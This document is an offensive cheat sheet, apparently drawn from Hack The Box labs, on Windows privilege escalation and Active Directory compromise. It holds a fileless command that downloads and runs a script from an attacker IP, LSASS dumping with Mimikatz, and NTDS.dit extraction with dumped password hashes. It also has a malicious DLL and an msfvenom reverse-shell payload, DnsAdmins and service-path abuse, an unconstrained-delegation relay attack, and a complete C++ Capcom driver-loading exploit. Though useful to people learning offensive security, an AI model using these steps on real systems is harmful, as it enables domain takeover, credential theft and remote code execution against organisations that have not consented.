Abuse Tokens
If you compromise a service account (for example the svc_mssql account) and its privileges are disabled, you can use the following tool to enable them.
Tools:
CLSIDS working for Windows 2019/2022
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1bf48339-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009539e4518
50d185b9-fff3-4656-92c7-e4018da4361d
3c6859ce-230b-484d-be6c-9320c0202408
PS C:\\htb> Import-Module .\\Enable-Privilege.ps1
PS C:\\htb> .\\EnableAllTokenPrivs.ps1
PS C:\\htb> whoami /priv
Fileless method:
IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.123/EnableAllTokenPrivs.ps1>');
#Check File permission
PS C:\\htb> Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
PS C:\\htb>takeown /f 'C:\\some\\file.txt' #Now the file is owned by you
PS C:\\htb> icacls 'C:\\some\\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\\repair\\sam
%WINDIR%\\repair\\system
%WINDIR%\\repair\\software
%WINDIR%\\repair\\security
%WINDIR%\\system32\\config\\security.sav
%WINDIR%\\system32\\config\\software.sav
%WINDIR%\\system32\\config\\system.sav
%WINDIR%\\system32\\config\\SecEvent.Evt
%WINDIR%\\system32\\config\\default.sav
c:\\inetpub\\wwwwroot\\web.config
C:\\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
PS C:\\htb> Import-Module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)
Members of the Event Log Readers group can read event logs from local computers. The group is created when the server is promoted to a domain controller.
Event generated: 4688(S): A new process has been created. (This event is generated every time a new process starts.)
#Searching Security Logs Using wevtutil
PS C:\\htb> wevtutil qe Security /rd:true /f:text | Select-String "/user"
C:\\htb> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
#Searching Security Logs Using Get-WinEvent
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
Note: Searching the Security event log with Get-WinEvent requires administrator access or permissions adjusted on the registry key HKLM\\System\\CurrentControlSet\\Services\\Eventlog\\Security. Membership in just the Event Log Readers group is not sufficient.
#Import Libraries
PS C:\\htb> Import-Module .\\SeBackupPrivilegeUtils.dll
PS C:\\htb> Import-Module .\\SeBackupPrivilegeCmdLets.dll
#Enabling SeBackupPrivilege
PS C:\\htb> Set-SeBackupPrivilege
PS C:\\htb> Get-SeBackupPrivilege
#Abusing SeBackupPrivilege
PS C:\\htb> Copy-FileSeBackupPrivilege 'C:\\Confidential\\2021 Contract.txt' .\\Contract.txt
PS C:\\htb> Copy-FileSeBackupPrivilege E:\\Windows\\NTDS\\ntds.dit C:\\Tools\\ntds.dit
#Attacking a Domain Controller - Copying NTDS.dit
PS C:\\htb> diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\\Windows\\Temp\\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
PS C:\\htb> dir E:
# Backing up SAM and SYSTEM Registry Hives
C:\\htb> reg save HKLM\\SYSTEM SYSTEM.SAV
C:\\htb> reg save HKLM\\SAM SAM.SAV
#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key
#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
#Copying Files with Robocopy
C:\\htb> robocopy /B E:\\Windows\\NTDS .\\ntds ntds.dit
Malicious Custom DLL
Intrusionz3r0@htb[/htb]$ x86_64-w64-mingw32-gcc -o pwn.dll pwn.c -shared
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
// Hand the placeholder command string to the C runtime's system(), which
// spawns a child command interpreter to run it. The string is fixed at
// compile time, so nothing is validated at run time. The result of system()
// is discarded; the function always returns 0.
int pwn()
{
system("COMMAND-HERE");
return 0;
}
// DLL entry point. pwn() runs once, on DLL_PROCESS_ATTACH, i.e. as soon as
// the loader maps the DLL into a process; the other reasons only break.
// The fall-through from DLL_PROCESS_ATTACH into the following cases is
// harmless here because those cases do nothing.
// NOTE(review): DllMain executes under the loader lock, and blocking work
// such as system() there is documented by Microsoft as unsafe.
// Always returns TRUE so the load is reported as successful regardless of
// what pwn() did. hModule and lpReserved are unused.
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
pwn();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
#Create Malicious DLL by using msfvenom
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -a x64 -f dll > rev.dll
#Loading Custom DLL
C:\\htb> dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
C:\\htb> sc stop dns
C:\\htb> sc start dns
#Clean up (Run as Administrator Shell)
C:\\htb> reg query \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters
C:\\htb> reg delete \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters /v ServerLevelPluginDll
C:\\htb> sc.exe start dns
C:\\htb> sc query dns
#Disabling the Global Query Block List
C:\\htb> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
C:\\htb> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
#Taking ownership of the Mozilla Maintenance Service binary
C:\\htb> takeown /F C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe
#Starting the Mozilla Maintenance Service
C:\\htb> sc.exe start MozillaMaintenance
If you hold SeMachineAccountPrivilege (the ability to add computer accounts) and SeEnableDelegationPrivilege, you can abuse unconstrained delegation.
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added
WORKSTATION_TRUST_ACCOUNT
4096
Indicates a machine account (mandatory)
TRUSTED_FOR_DELEGATION
524288
Enable Unconstrained Delegation
Total: 524288 + 4096 = 528384
#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated
Note: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl
❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Allow time for the record to replicate; you can use `nslookup evil.delegate.vl dc1.delegate.vl` to confirm it has replicated into AD.
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
Use: pypykatz crypto nt 'Password123'
❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIP>
❯ impacket-addcomputer delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account z3r0$ with password Password123.
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...
#Querying the AppReadiness Service to check the status
C:\htb> sc qc AppReadiness
#C:\\htb> c:\\Tools\\PsService.exe security AppReadiness
C:\htb> c:\Tools\PsService.exe security AppReadiness
#Modifying the Service Binary Path (Abuse)
C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
#Starting the Service
C:\htb> sc start AppReadiness
If we issue the command whoami /priv from an unelevated context and do not see SeLoadDriverPrivilege, we will need to bypass UAC.
/*
Reference:
Compile: sudo apt install mingw-w64 -y && x86_64-w64-mingw32-g++ -o EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.cpp -DUNICODE -D_UNICODE
<https://github.com/hatRiot/token-priv>
<https://github.com/TarlogicSecurity/EoPLoadDriver>
Enable the SeLoadDriverPrivilege of current process and then load the driver into the kernel.
First you need to add two registry values; the commands are:
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\test\\Capcom.sys"
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v Type /t REG_DWORD /d 1
Then run this program to load the driver (C:\\test\\Capcom.sys) into the kernel.
We will then have full access to the system.
*/
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Ntdll.lib")
// Resolve the user SID of hToken and return it as a string in the form
// produced by ConvertSidToStringSidW. Returns NULL on any failure.
// Per the ConvertSidToStringSidW contract the returned buffer belongs to the
// caller and is released with LocalFree; no caller in this listing does so.
LPWSTR getUserSid(HANDLE hToken)
{
// Get the size of the memory buffer needed for the SID
//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx
DWORD dwBufferSize = 0;
// First call with a NULL buffer is expected to fail with
// ERROR_INSUFFICIENT_BUFFER and report the required size in dwBufferSize.
if (!GetTokenInformation(hToken, TokenUser, NULL, 0, &dwBufferSize) &&
(GetLastError() != ERROR_INSUFFICIENT_BUFFER))
{
wprintf(L"GetTokenInformation failed, error: %d\\n",
GetLastError());
return NULL;
}
//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
PTOKEN_USER pUserToken = (PTOKEN_USER)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwBufferSize);
if (pUserToken == NULL) {
// NOTE(review): HeapFree on a NULL pointer frees nothing; this call is dead.
HeapFree(GetProcessHeap(), 0, (LPVOID)pUserToken);
return NULL;
}
// Retrive token info
if (!GetTokenInformation(
hToken,
TokenUser,
pUserToken,
dwBufferSize,
&dwBufferSize))
{
// NOTE(review): the error code is fetched and discarded, and pUserToken
// is not freed on this path.
GetLastError();
return NULL;
}
// Check if SID is valid
if (!IsValidSid(pUserToken->User.Sid))
{
wprintf(L"The owner SID is invalid.\\n");
return NULL;
}
// NOTE(review): the result of ConvertSidToStringSidW is not checked, so
// sidString is returned uninitialised if the conversion fails; pUserToken is
// also never freed on the success path.
LPWSTR sidString;
ConvertSidToStringSidW(pUserToken->User.Sid, &sidString);
return sidString;
}
// Load the kernel driver whose service key lives under the calling user's
// registry hive: "\Registry\User\<user SID>\System\CurrentControlSet\CAPCOM"
// (the values under that key are created by the reg commands in the header
// comment). NtLoadDriver and RtlInitUnicodeString are resolved from ntdll at
// run time. SeLoadDriverPrivilege must already be enabled on the process
// token (see EnablePriv / _tmain). dwErrorCode is declared but unused.
// Returns 0 on success, otherwise the Win32 error mapped from the NTSTATUS.
// Defender note: the service key here sits under a per-user hive rather than
// HKLM\SYSTEM\CurrentControlSet\Services; a driver load whose service key is
// under a user hive is the distinctive artefact of this technique.
ULONG
LoadDriver(HANDLE hToken)
{
UNICODE_STRING DriverServiceName;
ULONG dwErrorCode;
NTSTATUS status;
typedef NTSTATUS(_stdcall *NT_LOAD_DRIVER)(IN PUNICODE_STRING DriverServiceName);
typedef void (WINAPI* RTL_INIT_UNICODE_STRING)(PUNICODE_STRING, PCWSTR);
// NOTE(review): neither GetProcAddress result is checked for NULL.
NT_LOAD_DRIVER NtLoadDriver = (NT_LOAD_DRIVER)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtLoadDriver");
RTL_INIT_UNICODE_STRING RtlInitUnicodeString = (RTL_INIT_UNICODE_STRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
// MAX_PATH WCHARs are allocated but only MAX_PATH bytes are zeroed (half the
// buffer); lstrcat only relies on the leading terminator, which is zeroed.
// The buffer is never deleted.
LPWSTR win7regPath = new WCHAR[MAX_PATH];
ZeroMemory(win7regPath, MAX_PATH);
LPWSTR userSidStr;
userSidStr = getUserSid(hToken);
if (userSidStr == NULL)
{
// NOTE(review): this branch closes the token but does not return, so the
// lstrcat below is reached with userSidStr == NULL. hToken is a by-value
// copy; assigning NULL here does not affect the caller's handle variable.
wprintf(L"[+] Error while getting user SID\\n");
CloseHandle(hToken);
hToken = NULL;
}
// Assemble the native registry path to the per-user CAPCOM service key.
lstrcat(win7regPath, L"\\\\Registry\\\\User\\\\");
lstrcat(win7regPath, userSidStr);
lstrcat(win7regPath, L"\\\\System\\\\CurrentControlSet\\\\CAPCOM");
RtlInitUnicodeString(&DriverServiceName, win7regPath);
status = NtLoadDriver(&DriverServiceName);
// GetLastError() is printed for information only; the decision is made on
// the NTSTATUS.
printf("NTSTATUS: %08x, WinError: %d\\n", status, GetLastError());
if (!NT_SUCCESS(status))
return RtlNtStatusToDosError(status);
return 0;
}
// Print the DOMAIN\user that `tok` represents (via LookupAccountSid) and
// report whether it is the SYSTEM account. Note the inverted sense of the
// result: returns 0 when the user name is "SYSTEM" and 1 otherwise; also
// returns 0 when the token size query yields nothing.
// NOTE(review): `User` is malloc'd and never freed; the LookupAccountSid
// result is unchecked, so UserName/DomainName are printed uninitialised if it
// fails. _wcsicmp on a TCHAR buffer assumes a UNICODE build (the compile line
// in the header comment passes -DUNICODE).
int IsTokenSystem(HANDLE tok)
{
DWORD Size, UserSize, DomainSize;
SID *sid;
SID_NAME_USE SidType;
TCHAR UserName[64], DomainName[64];
TOKEN_USER *User;
Size = 0;
// Size query: Size stays 0 if the call fails.
GetTokenInformation(tok, TokenUser, NULL, 0, &Size);
if (!Size)
return 0;
User = (TOKEN_USER *)malloc(Size);
assert(User);
GetTokenInformation(tok, TokenUser, User, Size, &Size);
assert(Size);
// Copy the SID into its own buffer; only this copy is freed below.
Size = GetLengthSid(User->User.Sid);
assert(Size);
sid = (SID *)malloc(Size);
assert(sid);
CopySid(Size, sid, User->User.Sid);
// Sizes are in characters, minus one for the terminator.
UserSize = (sizeof UserName / sizeof *UserName) - 1;
DomainSize = (sizeof DomainName / sizeof *DomainName) - 1;
LookupAccountSid(NULL, sid, UserName, &UserSize, DomainName, &DomainSize, &SidType);
free(sid);
printf("whoami:\\n%S\\\\%S\\n", DomainName, UserName);
if (!_wcsicmp(UserName, L"SYSTEM"))
return 0;
return 1;
}
// Render the SE_PRIVILEGE_* attribute bits of one privilege into szAttrbutes
// as text, writing "Disabled" when no bit matched. The caller must pass a
// zero-initialised buffer, because the "Disabled" case is detected by
// szAttrbutes[0] == 0 (GetTokenPrivilege does so).
// NOTE(review): every wsprintf writes at the start of the buffer, so when
// several bits are set only the last matching label survives; `len` is
// accumulated but never used as an offset (presumably `szAttrbutes + len`
// was intended).
VOID RetPrivDwordAttributesToStr(DWORD attributes, LPTSTR szAttrbutes)
{
UINT len = 0;
if (attributes & SE_PRIVILEGE_ENABLED)
len += wsprintf(szAttrbutes, TEXT("Enabled"));
if (attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
len += wsprintf(szAttrbutes, TEXT("Enabled by default"));
if (attributes & SE_PRIVILEGE_REMOVED)
len += wsprintf(szAttrbutes, TEXT("Removed"));
if (attributes & SE_PRIVILEGE_USED_FOR_ACCESS)
len += wsprintf(szAttrbutes, TEXT("Used for access"));
if (szAttrbutes[0] == 0)
wsprintf(szAttrbutes, TEXT("Disabled"));
return;
}
// Print a "whoami /priv"-style listing of the privileges held by `tok`:
// the name via LookupPrivilegeName and the attributes via
// RetPrivDwordAttributesToStr. Returns 0 if the size query reports no data,
// 1 otherwise.
// NOTE(review): the size query asks for TokenGroups but the data read asks
// for TokenPrivileges, so dwRet may not match the size actually needed; the
// second GetTokenInformation result is unchecked and ppriv is never freed.
int GetTokenPrivilege(HANDLE tok)
{
PTOKEN_PRIVILEGES ppriv = NULL;
DWORD dwRet = 0;
GetTokenInformation(tok, TokenGroups, ppriv, dwRet, &dwRet);
if (!dwRet)
return 0;
ppriv = (PTOKEN_PRIVILEGES)calloc(dwRet, 1);
GetTokenInformation(tok, TokenPrivileges, ppriv, dwRet, &dwRet);
printf("\\nwhoami /priv\\n");
// `i` is int while PrivilegeCount is DWORD (signed/unsigned comparison).
for (int i = 0; i < ppriv->PrivilegeCount; i++)
{
TCHAR lpszPriv[MAX_PATH] = { 0 };
// This dwRet shadows the outer one; `n` (the lookup result) is unused.
DWORD dwRet = MAX_PATH;
BOOL n = LookupPrivilegeName(NULL, &(ppriv->Privileges[i].Luid), lpszPriv, &dwRet);
printf("%-50ws", lpszPriv);
// Zero-initialised so RetPrivDwordAttributesToStr can detect "no bits set".
TCHAR lpszAttrbutes[1024] = { 0 };
RetPrivDwordAttributesToStr(ppriv->Privileges[i].Attributes, lpszAttrbutes);
printf("%ws\\n", lpszAttrbutes);
}
return 1;
}
// Enable the privilege named by `priv` (e.g. SE_LOAD_DRIVER_NAME) on hToken
// via AdjustTokenPrivileges, then print the token user and privilege list.
// Returns TRUE on success, 0 if the privilege name cannot be resolved or the
// adjust call fails.
// NOTE(review): per the documented AdjustTokenPrivileges contract the call
// returns nonzero even when the token does not hold the privilege at all,
// reporting that case only through GetLastError() == ERROR_NOT_ALL_ASSIGNED.
// This code does not check it, so a token lacking SeLoadDriverPrivilege (the
// unelevated case described above the listing) passes through here as a
// success and the failure only surfaces later in NtLoadDriver.
BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, priv, &luid))
{
printf("[!]LookupPrivilegeValue error\\n");
return 0;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// PreviousState and ReturnLength are not requested.
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("[!]AdjustTokenPrivileges error\\n");
return 0;
}
// Diagnostics only; their return values are ignored.
IsTokenSystem(hToken);
GetTokenPrivilege(hToken);
return TRUE;
}
// Entry point: open the current process token with TOKEN_ALL_ACCESS, enable
// SeLoadDriverPrivilege on it, then call LoadDriver. The results of
// EnablePriv and LoadDriver are ignored and the exit code is 0 on every path,
// so success or failure is only visible in the printed output. The token
// handle is not closed here (LoadDriver closes it only on its SID-failure
// path). argc/argv are unused.
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
printf("[!]OpenProcessToken error\\n");
return 0;
}
EnablePriv(hToken, SE_LOAD_DRIVER_NAME);
LoadDriver(hToken);
return 0;
}
Favorite tool: (Windows Server 2019/2022)
UserAccountControl Values: